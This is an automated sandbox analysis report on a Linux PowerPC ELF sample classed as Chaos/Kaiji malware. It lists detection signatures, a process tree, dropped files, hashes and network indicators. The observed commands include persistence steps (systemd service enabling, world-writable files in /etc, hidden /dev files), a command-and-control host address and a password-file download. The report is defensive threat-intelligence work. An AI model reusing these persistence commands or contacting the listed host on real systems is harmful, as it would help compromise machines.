Linux Analysis Report
linux_ppc64el.elf

Overview

General Information

Sample name:linux_ppc64el.elf
Analysis ID:1562732
MD5:04893430bfaf82b24e726e9980c338b3
SHA1:9dfd9c35b547705b267b4c2acd5cb7699ba5edb5
SHA256:535b04d328da7b0be034710aeb74c4460c873d72ccf1e6e8186d4faf2e158c60
Tags:elf, user-abuse_ch
Infos:

Detection

Chaos
Score:76
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Chaos
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Sample tries to set files in /etc globally writable
Uses known network protocols on non-standard ports
Writes identical ELF files to multiple locations
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "kill" or "pkill" command typically used to terminate processes
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads CPU information from /sys indicative of miner or evasive malware
Reads the 'hosts' file potentially containing internal network hosts
Sample has stripped symbol table
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1562732
Start date and time:2024-11-25 23:46:15 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 27s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:linux_ppc64el.elf
Detection:MAL
Classification:mal76.troj.evad.linELF@0/44@4/0
  • VT rate limit hit for: linux_ppc64el.elf
Command:/tmp/linux_ppc64el.elf
PID:5483
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • linux_ppc64el.elf (PID: 5483, Parent: 5411, MD5: e179f86e81efbe80815812cd0b663076) Arguments: /tmp/linux_ppc64el.elf
    • bash (PID: 5490, Parent: 5483, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c /etc/32678&
      • bash New Fork (PID: 5503, Parent: 5490)
      • 32678 (PID: 5503, Parent: 2955, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/32678
        • 32678 New Fork (PID: 5514, Parent: 5503)
        • sleep (PID: 5514, Parent: 5503, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
    • service (PID: 5496, Parent: 5483, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
      • service New Fork (PID: 5507, Parent: 5496)
      • basename (PID: 5507, Parent: 5496, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 5515, Parent: 5496)
      • basename (PID: 5515, Parent: 5496, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 5516, Parent: 5496)
      • systemctl (PID: 5516, Parent: 5496, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
      • service New Fork (PID: 5528, Parent: 5496)
        • service New Fork (PID: 5530, Parent: 5528)
        • systemctl (PID: 5530, Parent: 5528, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
        • service New Fork (PID: 5531, Parent: 5528)
        • sed (PID: 5531, Parent: 5528, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    • systemctl (PID: 5496, Parent: 2955, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
    • linux_ppc64el.elf (PID: 5501, Parent: 5483, MD5: e179f86e81efbe80815812cd0b663076) Arguments: /tmp/linux_ppc64el.elf
      • update-rc.d (PID: 5526, Parent: 5501, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d linux_kill defaults
        • systemctl (PID: 5532, Parent: 5526, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • bash (PID: 5560, Parent: 5501, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable linux.service;systemctl start linux.service;journalctl -xe --no-pager"
        • bash New Fork (PID: 5562, Parent: 5560)
        • systemctl (PID: 5562, Parent: 5560, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
        • bash New Fork (PID: 5566, Parent: 5560)
        • systemctl (PID: 5566, Parent: 5560, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable linux.service
        • bash New Fork (PID: 5570, Parent: 5560)
        • systemctl (PID: 5570, Parent: 5560, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start linux.service
        • bash New Fork (PID: 5764, Parent: 5560)
        • journalctl (PID: 5764, Parent: 5560, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: journalctl -xe --no-pager
  • systemd New Fork (PID: 5542, Parent: 5541)
  • snapd-env-generator (PID: 5542, Parent: 5541, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5564, Parent: 5563)
  • snapd-env-generator (PID: 5564, Parent: 5563, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5568, Parent: 5567)
  • snapd-env-generator (PID: 5568, Parent: 5567, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5571, Parent: 1)
  • System.img.config (PID: 5571, Parent: 1, MD5: e179f86e81efbe80815812cd0b663076) Arguments: /boot/System.img.config
    • pkill (PID: 5599, Parent: 5571, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 32678
    • sh (PID: 5742, Parent: 5571, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /etc/32678&
      • sh New Fork (PID: 5755, Parent: 5742)
      • 32678 (PID: 5755, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/32678
        • 32678 New Fork (PID: 5763, Parent: 5755)
        • sleep (PID: 5763, Parent: 5755, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
        • 32678 New Fork (PID: 5806, Parent: 5755)
        • id.services.conf (PID: 5806, Parent: 5755, MD5: e179f86e81efbe80815812cd0b663076) Arguments: /etc/id.services.conf
          • pkill (PID: 5812, Parent: 5806, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 32678
          • sh (PID: 5820, Parent: 5806, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /etc/32678&
            • sh New Fork (PID: 5827, Parent: 5820)
            • 32678 (PID: 5827, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/32678
              • 32678 New Fork (PID: 5837, Parent: 5827)
              • sleep (PID: 5837, Parent: 5827, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
          • service (PID: 5825, Parent: 5806, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
            • service New Fork (PID: 5836, Parent: 5825)
            • basename (PID: 5836, Parent: 5825, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5838, Parent: 5825)
            • basename (PID: 5838, Parent: 5825, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5839, Parent: 5825)
            • systemctl (PID: 5839, Parent: 5825, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 5844, Parent: 5825)
              • service New Fork (PID: 5845, Parent: 5844)
              • systemctl (PID: 5845, Parent: 5844, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 5846, Parent: 5844)
              • sed (PID: 5846, Parent: 5844, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
          • systemctl (PID: 5825, Parent: 1, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
          • id.services.conf (PID: 5831, Parent: 5806, MD5: e179f86e81efbe80815812cd0b663076) Arguments: /etc/id.services.conf
    • service (PID: 5748, Parent: 5571, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
      • service New Fork (PID: 5762, Parent: 5748)
      • basename (PID: 5762, Parent: 5748, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 5765, Parent: 5748)
      • basename (PID: 5765, Parent: 5748, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 5766, Parent: 5748)
      • systemctl (PID: 5766, Parent: 5748, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
      • service New Fork (PID: 5772, Parent: 5748)
        • service New Fork (PID: 5773, Parent: 5772)
        • systemctl (PID: 5773, Parent: 5772, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
        • service New Fork (PID: 5774, Parent: 5772)
        • sed (PID: 5774, Parent: 5772, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    • systemctl (PID: 5748, Parent: 1, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
    • System.img.config (PID: 5756, Parent: 5571, MD5: e179f86e81efbe80815812cd0b663076) Arguments: /boot/System.img.config
  • sshd New Fork (PID: 5601, Parent: 940)
  • sshd (PID: 5601, Parent: 940, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
  • sshd New Fork (PID: 5602, Parent: 940)
  • sshd (PID: 5602, Parent: 940, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
  • sshd New Fork (PID: 5603, Parent: 940)
  • sshd (PID: 5603, Parent: 940, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
    • sshd New Fork (PID: 5607, Parent: 5603)
  • sshd New Fork (PID: 5604, Parent: 940)
  • sshd (PID: 5604, Parent: 940, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
    • sshd New Fork (PID: 5609, Parent: 5604)
  • sshd New Fork (PID: 5619, Parent: 940)
  • sshd (PID: 5619, Parent: 940, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
  • sshd New Fork (PID: 5666, Parent: 940)
  • sshd (PID: 5666, Parent: 940, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
    • sshd New Fork (PID: 5700, Parent: 5666)
  • sshd New Fork (PID: 5699, Parent: 940)
  • sshd (PID: 5699, Parent: 940, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
    • sshd New Fork (PID: 5724, Parent: 5699)
  • sshd New Fork (PID: 5727, Parent: 940)
  • sshd (PID: 5727, Parent: 940, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
    • sshd New Fork (PID: 5741, Parent: 5727)
  • cleanup
Name:Chaos
Description:Multi-functional malware written in Go, targeting both Linux and Windows, evolved from elf.kaiji.
Attribution:No Attribution
Blogpost URLs:
Link:https://malpedia.caad.fkie.fraunhofer.de/details/elf.chaos
Source | Rule | Description | Author | Strings
linux_ppc64el.elf | JoeSecurity_ChaosGo | Yara detected Chaos | Joe Security |
/etc/id.services.conf | JoeSecurity_ChaosGo | Yara detected Chaos | Joe Security |
/boot/System.img.config | JoeSecurity_ChaosGo | Yara detected Chaos | Joe Security |
        No Suricata rule has matched

        AV Detection

        Source: linux_ppc64el.elf | ReversingLabs: Detection: 42%
        Source: /tmp/linux_ppc64el.elf (PID: 5501) | Reads CPU info from /sys: /sys/devices/system/cpu/online
        Source: /usr/bin/pkill (PID: 5599) | Reads CPU info from /sys: /sys/devices/system/cpu/online
        Source: /usr/bin/pkill (PID: 5812) | Reads CPU info from /sys: /sys/devices/system/cpu/online

        Networking

        Source: global traffic | TCP traffic: 103.135.101.78 ports 808,52462,2,4,5,6
        Source: unknown | Network traffic detected: HTTP traffic on port 47700 -> 808
        Source: unknown | Network traffic detected: HTTP traffic on port 808 -> 47700
        Source: global traffic | TCP traffic: 192.168.2.14:42412 -> 103.135.101.78:52462
        Source: /tmp/linux_ppc64el.elf (PID: 5501) | Reads hosts file: /etc/hosts
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic | HTTP traffic detected: GET /password.txt HTTP/1.1, Host: 103.135.101.78:808, User-Agent: Go-http-client/1.1, Accept-Encoding: gzip
        Source: global traffic | DNS traffic detected: DNS query: www.google.com
        Source: global traffic | DNS traffic detected: DNS query: aras.liveya.org
        Source: ELF static info symbol of initial sample | .symtab present: no
        Source: /usr/bin/pkill (PID: 5599) | SIGKILL sent: pid: 5503, result: successful
        Source: /usr/bin/pkill (PID: 5812) | SIGKILL sent: pid: 5755, result: successful
        Source: classification engine | Classification label: mal76.troj.evad.linELF@0/44@4/0
        Source: ELF file section | Submission: linux_ppc64el.elf
        Source: ELF file section | Dropped file: id.services.conf.12.dr
        Source: ELF file section | Dropped file: System.img.config.19.dr

        Persistence and Installation Behavior

        Source: /tmp/linux_ppc64el.elf (PID: 5483) | File: /etc/id.services.conf (bits: - usr: rx grp: rx all: rwx)
        Source: /tmp/linux_ppc64el.elf (PID: 5483) | File: /etc/32678 (bits: - usr: rx grp: rx all: rwx)
        Source: /tmp/linux_ppc64el.elf (PID: 5501) | File with SHA-256 535B04D328DA7B0BE034710AEB74C4460C873D72CCF1E6E8186D4FAF2E158C60 written: /boot/System.img.config
        Source: /tmp/linux_ppc64el.elf (PID: 5483) | File with SHA-256 535B04D328DA7B0BE034710AEB74C4460C873D72CCF1E6E8186D4FAF2E158C60 written: /etc/id.services.conf
        Source: /tmp/linux_ppc64el.elf (PID: 5501) | File: /dev/.old
        Source: /tmp/linux_ppc64el.elf (PID: 5501) | File: /dev/.img
        Source: /etc/id.services.conf (PID: 5831) | File: /dev/.old
        Source: /etc/id.services.conf (PID: 5831) | File: /dev/.img
        Source: /boot/System.img.config (PID: 5756) | File: /dev/.old
        Source: /boot/System.img.config (PID: 5756) | File: /dev/.img
        Source: /boot/System.img.config (PID: 5756) | Empty hidden file: /dev/.old
        Source: /boot/System.img.config (PID: 5756) | Empty hidden file: /dev/.img
        Source: /tmp/linux_ppc64el.elf (PID: 5490) Shell command executed: /bin/bash -c /etc/32678&
        Source: /tmp/linux_ppc64el.elf (PID: 5560) Shell command executed: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable linux.service;systemctl start linux.service;journalctl -xe --no-pager"
        Source: /boot/System.img.config (PID: 5599) Pkill executable: /usr/bin/pkill -> pkill -9 32678
        Source: /etc/id.services.conf (PID: 5812) Pkill executable: /usr/bin/pkill -> pkill -9 32678
        Source: /usr/sbin/service (PID: 5496) Systemctl executable: /usr/bin/systemctl -> systemctl start crond.service
        Source: /usr/sbin/service (PID: 5516) Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target
        Source: /usr/sbin/service (PID: 5530) Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket
        Source: /usr/sbin/update-rc.d (PID: 5532) Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload
        Source: /bin/bash (PID: 5562) Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload
        Source: /bin/bash (PID: 5566) Systemctl executable: /usr/bin/systemctl -> systemctl enable linux.service
        Source: /bin/bash (PID: 5570) Systemctl executable: /usr/bin/systemctl -> systemctl start linux.service
        Source: /usr/sbin/service (PID: 5825) Systemctl executable: /usr/bin/systemctl -> systemctl start crond.service
        Source: /usr/sbin/service (PID: 5839) Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target
        Source: /usr/sbin/service (PID: 5845) Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket
        Source: /usr/sbin/service (PID: 5748) Systemctl executable: /usr/bin/systemctl -> systemctl start crond.service
        Source: /usr/sbin/service (PID: 5766) Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target
        Source: /usr/sbin/service (PID: 5773) Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket
        Source: /tmp/linux_ppc64el.elf (PID: 5483) File: /etc/id.services.conf (bits: - usr: rx grp: rx all: rwx)
        Source: /tmp/linux_ppc64el.elf (PID: 5483) File: /etc/32678 (bits: - usr: rx grp: rx all: rwx)
        Source: /tmp/linux_ppc64el.elf (PID: 5501) File: /boot/System.img.config (bits: - usr: rx grp: rx all: rwx)
        Source: /tmp/linux_ppc64el.elf (PID: 5483) File written: /etc/id.services.conf
        Source: /tmp/linux_ppc64el.elf (PID: 5501) File written: /boot/System.img.config
        Source: /tmp/linux_ppc64el.elf (PID: 5483) Writes shell script file to disk with an unusual file extension: /etc/32678
        Source: /tmp/linux_ppc64el.elf (PID: 5501) Writes shell script file to disk with an unusual file extension: /etc/init.d/linux_kill
        Source: /usr/sbin/service (PID: 5531) Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
        Source: /usr/sbin/service (PID: 5846) Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
        Source: /usr/sbin/service (PID: 5774) Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

        Hooking and other Techniques for Hiding and Protection

        Source: /tmp/linux_ppc64el.elf (PID: 5501) File: /etc/init.d/linux_kill
        Source: unknown Network traffic detected: HTTP traffic on port 47700 -> 808
        Source: unknown Network traffic detected: HTTP traffic on port 808 -> 47700
        Source: /etc/32678 (PID: 5514) Sleep executable: /usr/bin/sleep -> sleep 60
        Source: /etc/32678 (PID: 5763) Sleep executable: /usr/bin/sleep -> sleep 60
        Source: /etc/32678 (PID: 5837) Sleep executable: /usr/bin/sleep -> sleep 60
        Source: /tmp/linux_ppc64el.elf (PID: 5501) Reads CPU info from /sys: /sys/devices/system/cpu/online
        Source: /usr/bin/pkill (PID: 5599) Reads CPU info from /sys: /sys/devices/system/cpu/online
        Source: /usr/bin/pkill (PID: 5812) Reads CPU info from /sys: /sys/devices/system/cpu/online
        Source: /usr/bin/sleep (PID: 5514) Sleeps longer then 60s: 60.0s
        Source: /usr/bin/sleep (PID: 5763) Sleeps longer then 60s: 60.0s
        Source: /usr/bin/sleep (PID: 5837) Sleeps longer then 60s: 60.0s
        Source: /tmp/linux_ppc64el.elf (PID: 5483) Queries kernel information via 'uname'
        Source: /bin/bash (PID: 5490) Queries kernel information via 'uname'
        Source: /tmp/linux_ppc64el.elf (PID: 5501) Queries kernel information via 'uname'
        Source: /bin/bash (PID: 5560) Queries kernel information via 'uname'
        Source: /boot/System.img.config (PID: 5571) Queries kernel information via 'uname'
        Source: /etc/id.services.conf (PID: 5806) Queries kernel information via 'uname'
        Source: /etc/id.services.conf (PID: 5831) Queries kernel information via 'uname'
        Source: /boot/System.img.config (PID: 5756) Queries kernel information via 'uname'

        Stealing of Sensitive Information

        Source: Yara match File source: linux_ppc64el.elf, type: SAMPLE
        Source: Yara match File source: /etc/id.services.conf, type: DROPPED
        Source: Yara match File source: /boot/System.img.config, type: DROPPED

        Remote Access Functionality

        Source: Yara match File source: linux_ppc64el.elf, type: SAMPLE
        Source: Yara match File source: /etc/id.services.conf, type: DROPPED
        Source: Yara match File source: /boot/System.img.config, type: DROPPED

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 1 Systemd Service | 1 Systemd Service | 1 Masquerading | 1 OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 11 Non-Standard Port | Exfiltration Over Other Network Medium | 1 Data Manipulation
        Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Scripting | Boot or Logon Initialization Scripts | 1 Hide Artifacts | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Virtualization/Sandbox Evasion | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 File and Directory Permissions Modification | NTDS | 1 System Information Discovery | Distributed Component Object Model | Input Capture | 2 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Disable or Modify Tools | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Hidden Files and Directories | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

        No configs have been found
        [Behavior graph: ID 1562732, Sample: linux_ppc64el.elf, Startdate: 25/11/2024, Architecture: LINUX, Score: 76]

        Source | Detection | Scanner | Label | Link
        linux_ppc64el.elf | 42% | ReversingLabs | Linux.Trojan.Kaiji |

        Source | Detection | Scanner | Label | Link
        /boot/System.img.config | 42% | ReversingLabs | Linux.Trojan.Kaiji |
        /etc/32678 | 0% | ReversingLabs | |
        /etc/id.services.conf | 42% | ReversingLabs | Linux.Trojan.Kaiji |
        /etc/init.d/linux_kill | 0% | ReversingLabs | |

        No Antivirus matches

        Source | Detection | Scanner | Label | Link
        http://103.135.101.78:808/password.txt | 0% | Avira URL Cloud | safe |

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        aras.liveya.org | 103.135.101.78 | true | true | | unknown
        www.google.com | 142.250.181.100 | true | false | | high

        Name | Malicious | Antivirus Detection | Reputation
        http://103.135.101.78:808/password.txt | true | Avira URL Cloud: safe | unknown

        Name | Source | Malicious | Antivirus Detection | Reputation
        http://www.baidu.com/search/spider.html) | linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.dr | false | | high
        http://search.msn.com/msnbot.htm | linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.dr | false | | high
        http://www.baidu.com/search/spider.html)000102030405060708091011121314151617181920212223242526272829 | linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.dr | false | | high
        https://www.so.com/s?q=index | linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.dr | false | | high
        http://help.yahoo.com/help/us/ysearch/slurp)x509: | linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.dr | false | | high
        http://www.google.com/mobile/adsbot.html) | linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.dr | false | | high
        http://www.huaweisymantec.com/cn/IRL/spider)Mozilla/5.0 | linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.dr | false | | high
        http://www.baidu.com/search/spider.html)http2: | linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.dr | false | | high
        http://yandex.com/bots)http: | linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.dr | false | | high
        http://www.baidu.com/search/spider.html)Mozilla/5.0 | id.services.conf.12.dr | false | | high
        http://www.entireweb.com/about/search_tech/speedy_spider/)text/html | linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.dr | false | | high
        http://www.haosou.com/help/help_3_2.htmlMozilla/5.0 | linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.dr | false | | high
        https://www.baidu.com/s?wd=insufficient | linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.dr | false | | high
        http://www.youdao.com/help/webmaster/spider/;)reflect: | linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.dr | false | | high
        https://search.yahoo.com/search?p=illegal | linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.dr | false | | high

        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
        103.135.101.78 | aras.liveya.org | Hong Kong | | 4842 | TH-AS-APTianhaiInfoTechCN | true

        No context

        Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
        www.google.com | file.exe | | malicious | Clipboard Hijacker, Cryptbot | | 172.217.21.36
        www.google.com | https://shorturl.at/ZbKEL?REVd=Vhx6ZLBnjMm | | malicious | Unknown | | 172.217.21.36
        www.google.com | https://avidgroup.famislnc.com/fvcvfxfec/cc6d843dfd/?1f9da=amtsZW1wQGNhcmlzbHMuY29t | | malicious | Unknown | | 172.217.21.36
        www.google.com | file.exe | | malicious | Amadey, Credential Flusher, Cryptbot, DarkTortilla, LummaC Stealer, Stealc, Vidar | | 142.250.181.100
        www.google.com | https://Saic.anastaclooverseas.com/zwfgemvfcbcitui/xivyvjldaquzs/Zgktmgjdfgpirwe89g0xmaersk/ixiswwcbzmfgee/jebqtppyunp/random.bby/inpoxqhfiww/gmail.com/ozwunijponqp8 | | malicious | Unknown | | 142.250.181.100
        www.google.com | file.exe | | malicious | Clipboard Hijacker, Cryptbot | | 142.250.181.68
        www.google.com | file.exe | | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | | 142.250.181.68
        www.google.com | Fumari INC.eml | | malicious | Unknown | | 216.58.208.228
        www.google.com | https://invites-doc.webflow.io/ | | malicious | HTMLPhisher | | 142.250.181.68
        www.google.com | Fumari INC.eml | | malicious | Unknown | | 142.250.181.68

        Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
        TH-AS-APTianhaiInfoTechCN | DO-COSU6387686280.pdf.exe | | malicious | FormBook, PureLog Stealer | | 202.61.233.66
        TH-AS-APTianhaiInfoTechCN | Payload 94.75 (3).225.exe | | malicious | Unknown | | 202.61.204.198
        TH-AS-APTianhaiInfoTechCN | Payload 94.75.225.exe | | malicious | Unknown | | 202.61.196.212
        TH-AS-APTianhaiInfoTechCN | xi.arm.elf | | malicious | Mirai, Moobot | | 103.135.101.188
        TH-AS-APTianhaiInfoTechCN | xi.arm7.elf | | malicious | Mirai, Moobot | | 103.135.101.188
        TH-AS-APTianhaiInfoTechCN | xi.m68k.elf | | malicious | Mirai, Moobot | | 103.135.101.188
        TH-AS-APTianhaiInfoTechCN | xi.x86.elf | | malicious | Mirai, Moobot | | 103.135.101.188
        TH-AS-APTianhaiInfoTechCN | xi.mips.elf | | malicious | Mirai, Moobot | | 103.135.101.188
        TH-AS-APTianhaiInfoTechCN | https://link.edgepilot.com/s/c12cb3f0/yNbpJS7pykGhMMzxNnzxvw?u=https://hinproperty.com/ | | malicious | Unknown | | 202.61.198.34
        TH-AS-APTianhaiInfoTechCN | https://tlktokmali.top/ | | malicious | Unknown | | 103.27.79.82

        No context

        Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
        /etc/32678 | linux_ppc64.elf | | malicious | Chaos | |
        /etc/32678 | linux_ppc64el.elf | | malicious | Chaos | |
        /etc/32678 | linux_386.elf | | malicious | Chaos | |
        /etc/32678 | linux_arm5.elf | | malicious | Chaos | |
        /etc/32678 | linux_arm6.elf | | malicious | Chaos | |
        /etc/32678 | linux_arm64.elf | | malicious | Chaos | |
        /etc/32678 | linux_amd64.elf | | malicious | Chaos | |
        /etc/32678 | linux_arm7.elf | | malicious | Chaos | |
        /etc/32678 | linux_arm6.elf | | malicious | Chaos | |
        /etc/32678 | linux_arm5.elf | | malicious | Chaos | |

        Process: /tmp/linux_ppc64el.elf
        File Type: ELF 64-bit LSB executable, 64-bit PowerPC or cisco 7500, OpenPOWER ELF V2 ABI, version 1 (SYSV), statically linked, Go BuildID=Y52nvXRmmagZPlBTD-aN/NAr5Akn8HWwmUdYC_fAB/CpqR8sVX_ghDLQQPm5P-/GAtPsar0-LeUP45KvIBJ, stripped
        Category: dropped
        Size (bytes): 5111808
        Entropy (8bit): 5.971492382871872
        Encrypted: false
        SSDEEP: 49152:i2LzgioAq4P670Og/d6I+eFRgjpmbLQYLy28qntKyB1:nLzgioh4P670Og/d6I+wgjpaLya
        MD5: 04893430BFAF82B24E726E9980C338B3
        SHA1: 9DFD9C35B547705B267B4C2ACD5CB7699BA5EDB5
        SHA-256: 535B04D328DA7B0BE034710AEB74C4460C873D72CCF1E6E8186D4FAF2E158C60
        SHA-512: C20622C1339EDCBA1F4DF9F17876C460D42353DF319EA2CEB14C8467B8A5099E264173352A226FC4D41C9A4089FF831A36ACCABDC2E2C9A72847BAE06C2F9D0F
        Malicious: true
        Yara Hits:
